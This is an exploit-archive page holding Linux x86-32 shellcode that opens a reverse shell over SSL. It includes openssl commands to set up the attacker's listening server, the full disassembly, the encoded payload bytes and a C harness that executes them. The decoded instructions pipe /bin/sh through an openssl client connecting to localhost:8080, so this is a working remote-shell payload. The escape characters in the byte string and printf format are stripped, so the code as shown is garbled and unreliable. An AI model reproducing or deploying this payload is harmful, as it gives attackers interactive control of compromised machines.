[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
# Published : 2011-06-08
# Author :
# Previous Title : Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
# Next Title : Linux/ARM - Disable ASLR Security - 102 bytes
/*
**
** Title: Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
** Date: 2011-06-08
** Tested on: ArchLinux i686
** Author: Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
**
** Configurations server
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024
** jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr
** jonathan@ArchLinux [ssl] $ cp server.key server.key.org
** jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key
** jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -sign
** key server.key -out server.crt
** jonathan@ArchLinux [ssl] $ ll
** total 16
** -rw-r--r-- 1 jonathan users 757 Jun 8 09:36 server.crt
** -rw-r--r-- 1 jonathan users 603 Jun 8 09:36 server.csr
** -rw-r--r-- 1 jonathan users 887 Jun 8 09:36 server.key
** -rw-r--r-- 1 jonathan users 963 Jun 8 09:36 server.key.org
** jonathan@ArchLinux [ssl] $
**
**
** Running server
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.cr
** t -accept 8080
**
**
** After the server was opened, you can send the shellcode.
** Warning! The client need tsch and openssl installed.
**
**
** Informations shellcode
** ===========================================================================
**
** Reverse TCP with SSL (why not)
** Linux x86 32bits
** 422 bytes
**
**
** ASM sources
** ===========================================================================
**
** 08048054 <main>:
** 8048054: 31 c0 xor %eax,%eax
** 8048056: 50 push %eax
** 8048057: 6a 65 push $0x65
** 8048059: 68 6b 70 69 70 push $0x7069706b
** 804805e: 68 2f 62 61 63 push $0x6361622f
** 8048063: 68 2f 74 6d 70 push $0x706d742f
** 8048068: 89 e3 mov %esp,%ebx
** 804806a: b0 0a mov $0xa,%al
** 804806c: cd 80 int $0x80
** 804806e: 85 c0 test %eax,%eax
** 8048070: 75 32 jne 80480a4 <del2>
** 8048072: 31 c0 xor %eax,%eax
** 8048074: 31 db xor %ebx,%ebx
** 8048076: 31 d2 xor %edx,%edx
** 8048078: b3 01 mov $0x1,%bl
** 804807a: 31 c0 xor %eax,%eax
** 804807c: 50 push %eax
** 804807d: 6a 6e push $0x6e
** 804807f: 66 68 64 5c pushw $0x5c64
** 8048083: 68 6c 65 74 65 push $0x6574656c
** 8048088: 68 65 20 64 65 push $0x65642065
** 804808d: 68 6b 70 69 70 push $0x7069706b
** 8048092: 68 2f 62 61 63 push $0x6361622f
** 8048097: 68 2f 74 6d 70 push $0x706d742f
** 804809c: 89 e1 mov %esp,%ecx
** 804809e: b2 17 mov $0x17,%dl
** 80480a0: b0 04 mov $0x4,%al
** 80480a2: cd 80 int $0x80
** 080480a4 <del2>:
** 80480a4: 31 c0 xor %eax,%eax
** 80480a6: 50 push %eax
** 80480a7: 66 68 73 6c pushw $0x6c73
** 80480ab: 68 2f 63 62 73 push $0x7362632f
** 80480b0: 68 2f 74 6d 70 push $0x706d742f
** 80480b5: 89 e3 mov %esp,%ebx
** 80480b7: b0 0a mov $0xa,%al
** 80480b9: cd 80 int $0x80
** 80480bb: 85 c0 test %eax,%eax
** 80480bd: 75 2a jne 80480e9 <open>
** 80480bf: 31 c0 xor %eax,%eax
** 80480c1: 31 db xor %ebx,%ebx
** 80480c3: 31 d2 xor %edx,%edx
** 80480c5: 50 push %eax
** 80480c6: 68 65 64 5c 6e push $0x6e5c6465
** 80480cb: 68 65 6c 65 74 push $0x74656c65
** 80480d0: 68 73 6c 20 64 push $0x64206c73
** 80480d5: 68 2f 63 62 73 push $0x7362632f
** 80480da: 68 2f 74 6d 70 push $0x706d742f
** 80480df: 89 e1 mov %esp,%ecx
** 80480e1: b3 01 mov $0x1,%bl
** 80480e3: b2 14 mov $0x14,%dl
** 80480e5: b0 04 mov $0x4,%al
** 80480e7: cd 80 int $0x80
**
** 080480e9 <open>:
** 80480e9: 31 c0 xor %eax,%eax
** 80480eb: 31 c9 xor %ecx,%ecx
** 80480ed: 31 d2 xor %edx,%edx
** 80480ef: 66 b9 41 04 mov $0x441,%cx
** 80480f3: 66 ba a4 01 mov $0x1a4,%dx
** 80480f7: 50 push %eax
** 80480f8: 66 68 73 6c pushw $0x6c73
** 80480fc: 68 2f 63 62 73 push $0x7362632f
** 8048101: 68 2f 74 6d 70 push $0x706d742f
** 8048106: 89 e3 mov %esp,%ebx
** 8048108: b0 05 mov $0x5,%al
** 804810a: cd 80 int $0x80
** 804810c: 89 c6 mov %eax,%esi
**
** 0804810e <wtite>:
** 804810e: 31 d2 xor %edx,%edx
** 8048110: 89 f3 mov %esi,%ebx
** 8048112: 31 c0 xor %eax,%eax
** 8048114: 50 push %eax
** 8048115: 66 68 70 65 pushw $0x6570
** 8048119: 68 63 6b 70 69 push $0x69706b63
** 804811e: 68 70 2f 62 61 push $0x61622f70
** 8048123: 68 3e 2f 74 6d push $0x6d742f3e
** 8048128: 68 73 68 20 31 push $0x31206873
** 804812d: 68 6e 2f 74 63 push $0x63742f6e
** 8048132: 68 20 2f 62 69 push $0x69622f20
** 8048137: 68 70 65 20 7c push $0x7c206570
** 804813c: 68 63 6b 70 69 push $0x69706b63
** 8048141: 68 70 2f 62 61 push $0x61622f70
** 8048146: 68 3c 2f 74 6d push $0x6d742f3c
**
** "x6cx6fx63x61x6cx68x6fx73x74x3ax38x30x38x30" >----------+
** localhost:8080 |
** If you change that, you need to change write(..., ..., size_t) (%edx) |
** |
** 804814b: 68 38 30 20 30 push $0x30203038 <---+
** 8048150: 68 74 3a 38 30 push $0x30383a74 <---+
** 8048155: 68 6c 68 6f 73 push $0x736f686c <---+
** 804815a: 68 6c 6f 63 61 push $0x61636f6c <---+
**
**
** 804815f: 68 65 63 74 20 push $0x20746365
** 8048164: 68 63 6f 6e 6e push $0x6e6e6f63
** 8048169: 68 6e 74 20 2d push $0x2d20746e
** 804816e: 68 63 6c 69 65 push $0x65696c63
** 8048173: 68 6c 20 73 5f push $0x5f73206c
** 8048178: 68 65 6e 73 73 push $0x73736e65
** 804817d: 68 6e 2f 6f 70 push $0x706f2f6e
** 8048182: 68 72 2f 62 69 push $0x69622f72
** 8048187: 68 20 2f 75 73 push $0x73752f20
** 804818c: 68 70 20 26 26 push $0x26262070
** 8048191: 68 69 70 65 20 push $0x20657069
** 8048196: 68 61 63 6b 70 push $0x706b6361
** 804819b: 68 6d 70 2f 62 push $0x622f706d
** 80481a0: 68 64 20 2f 74 push $0x742f2064
** 80481a5: 68 6d 6b 6e 6f push $0x6f6e6b6d
** 80481aa: 89 e1 mov %esp,%ecx
** 80481ac: b2 77 mov $0x77,%dl
** 80481ae: 31 c0 xor %eax,%eax
** 80481b0: b0 04 mov $0x4,%al
** 80481b2: cd 80 int $0x80
**
** 080481b4 <close>:
** 80481b4: 31 c0 xor %eax,%eax
** 80481b6: b0 06 mov $0x6,%al
** 80481b8: 89 f3 mov %esi,%ebx
** 80481ba: cd 80 int $0x80
**
** 080481bc <execve>:
** 80481bc: 31 c0 xor %eax,%eax
** 80481be: 50 push %eax
** 80481bf: 66 68 73 6c pushw $0x6c73
** 80481c3: 68 2f 63 62 73 push $0x7362632f
** 80481c8: 68 2f 74 6d 70 push $0x706d742f
** 80481cd: 89 e3 mov %esp,%ebx
** 80481cf: 50 push %eax
** 80481d0: 66 68 2d 65 pushw $0x652d
** 80481d4: 89 e1 mov %esp,%ecx
** 80481d6: 50 push %eax
** 80481d7: 6a 68 push $0x68
** 80481d9: 66 68 2f 73 pushw $0x732f
** 80481dd: 68 2f 62 69 6e push $0x6e69622f
** 80481e2: 89 e2 mov %esp,%edx
** 80481e4: 50 push %eax
** 80481e5: 53 push %ebx
** 80481e6: 51 push %ecx
** 80481e7: 52 push %edx
** 80481e8: 89 e1 mov %esp,%ecx
** 80481ea: 89 d3 mov %edx,%ebx
** 80481ec: 31 d2 xor %edx,%edx
** 80481ee: b0 0b mov $0xb,%al
** 80481f0: cd 80 int $0x80
**
** 080481f2 <exit>:
** 80481f2: 31 c0 xor %eax,%eax
** 80481f4: b0 01 mov $0x1,%al
** 80481f6: 31 db xor %ebx,%ebx
** 80481f8: cd 80 int $0x80
**
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char SC[] = "x31xc0x50x6ax65x68x6bx70x69x70x68x2fx62x61x63"
"x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0x75x32"
"x31xc0x31xdbx31xd2xb3x01x31xc0x50x6ax6ex66x68"
"x64x5cx68x6cx65x74x65x68x65x20x64x65x68x6bx70"
"x69x70x68x2fx62x61x63x68x2fx74x6dx70x89xe1xb2"
"x17xb0x04xcdx80x31xc0x50x66x68x73x6cx68x2fx63"
"x62x73x68x2fx74x6dx70x89xe3xb0x0axcdx80x85xc0"
"x75x2ax31xc0x31xdbx31xd2x50x68x65x64x5cx6ex68"
"x65x6cx65x74x68x73x6cx20x64x68x2fx63x62x73x68"
"x2fx74x6dx70x89xe1xb3x01xb2x14xb0x04xcdx80x31"
"xc0x31xc9x31xd2x66xb9x41x04x66xbaxa4x01x50x66"
"x68x73x6cx68x2fx63x62x73x68x2fx74x6dx70x89xe3"
"xb0x05xcdx80x89xc6x31xd2x89xf3x31xc0x50x66x68"
"x70x65x68x63x6bx70x69x68x70x2fx62x61x68x3ex2f"
"x74x6dx68x73x68x20x31x68x6ex2fx74x63x68x20x2f"
"x62x69x68x70x65x20x7cx68x63x6bx70x69x68x70x2f"
"x62x61x68x3cx2fx74x6d"
/* localhost:8080 */
"x68x38x30x20x30x68x74x3ax38x30x68x6cx68x6fx73"
"x68x6cx6fx63x61"
/* EOF */
"x68x65x63x74x20x68x63x6fx6ex6ex68x6ex74x20x2d"
"x68x63x6cx69x65x68x6cx20x73x5fx68x65x6ex73x73"
"x68x6ex2fx6fx70x68x72x2fx62x69x68x20x2fx75x73"
"x68x70x20x26x26x68x69x70x65x20x68x61x63x6bx70"
"x68x6dx70x2fx62x68x64x20x2fx74x68x6dx6bx6ex6f"
"x89xe1xb2x77x31xc0xb0x04xcdx80x31xc0xb0x06x89"
"xf3xcdx80x31xc0x50x66x68x73x6cx68x2fx63x62x73"
"x68x2fx74x6dx70x89xe3x50x66x68x2dx65x89xe1x50"
"x6ax68x66x68x2fx73x68x2fx62x69x6ex89xe2x50x53"
"x51x52x89xe1x89xd3x31xd2xb0x0bxcdx80x31xc0xb0"
"x01x31xdbxcdx80";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
}